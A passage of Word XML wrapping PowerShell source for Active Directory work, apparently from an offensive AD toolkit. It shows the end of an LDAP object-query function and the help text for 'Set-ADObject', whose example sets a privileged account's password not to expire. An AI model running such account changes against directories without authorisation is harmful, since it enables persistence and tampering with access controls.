    <w:p w14:paraId="49B8FC71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58B95929" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599E5921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE1BA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007DF9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="091A4CE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103E1C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF85B51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED400B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CB24B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($SID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0AF1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if a SID is passed, try to resolve it to a reachable domain name for the searcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A59B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A201F64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Name = Convert-SidToName $SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61005F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if($Name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57E319" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Canonical = Convert-ADName -ObjectName $Name -InputType NT4 -OutputType Canonical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB024D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Canonical) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73819E52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Domain = $Canonical.split("/")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3B0AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD53C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243FA53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Warning "Error resolving SID '$SID'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6ED89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A338121" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED9917" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16F9D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BC24A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD95D29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning "Error resolving SID '$SID' : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D7C44A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05920EEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F532483" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC98F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F745035" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35E85B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B1FC27F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ObjectSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75815E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($SID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F0B71D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectSearcher.filter = "(&amp;(objectsid=$SID)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD7D59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE8073" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($Name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62826955" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectSearcher.filter = "(&amp;(name=$Name)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FCC81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925368C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SamAccountName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA6FD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ObjectSearcher.filter = "(&amp;(samAccountName=$SamAccountName)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91D39E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21700A93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62526964" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results = $ObjectSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1FFD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DFAA46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($ReturnRaw) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9425DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D2817" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77B28D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7709ADE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496164B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386091D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC715FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA31F37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF16383" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ObjectSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A836CF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7E114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56826939" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B88F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29919291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50B098AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Set-ADObject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DDC9B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490330B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03045D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DCB35AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Takes a SID, name, or SamAccountName to query for a specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D74281" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        domain object, and then sets a specified 'PropertyName' to a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F3717" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        specified 'PropertyValue'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00913A50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E76B114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7437F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2792D82B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The SID of the domain object you're querying for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BA544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D7FEBA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F807095" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D6BFB57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The Name of the domain object you're querying for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12961213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="224011BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF520EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CFD16CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SamAccountName of the domain object you're querying for. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446106EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59537229" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F7458" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="102F51ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for objects, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266B19D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38B89692" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C754446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59C8E4C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFCAA37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A1ABB40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E53BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="052ED95F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Additional LDAP filter string for the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155B9F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00CC6299" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PropertyName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF32AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62778E9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The property name to set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6B65D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59AED065" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PropertyValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227D9EE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48454F65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The value to set for PropertyName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603A2DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="748BFBEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PropertyXorValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394CDF22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5518F6FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Integer value to binary xor (-bxor) with the current int value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8275F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E9B2AB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ClearValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2D26D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A0F638F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Clear the value of PropertyName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B351F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AE1CDBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E9F95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="775CDB63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40595103" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D85B73B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD335CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AC35AAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A85F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7192B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="261675C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B16ACC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F5AF897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Set-ADObject -SamAccountName matt.admin -PropertyName countrycode -PropertyValue 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF8295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08418425" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Set the countrycode for matt.admin to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54773637" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C67AD59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30723993" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29179B30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Set-ADObject -SamAccountName matt.admin -PropertyName useraccountcontrol -PropertyXorValue 65536</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A951AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE9656" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Set the password not to expire on matt.admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA4832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16406FAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4108D43A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC29E7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747376A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3225D013" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC3853" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CF9B6AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1BB53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC4CFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7682B76A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
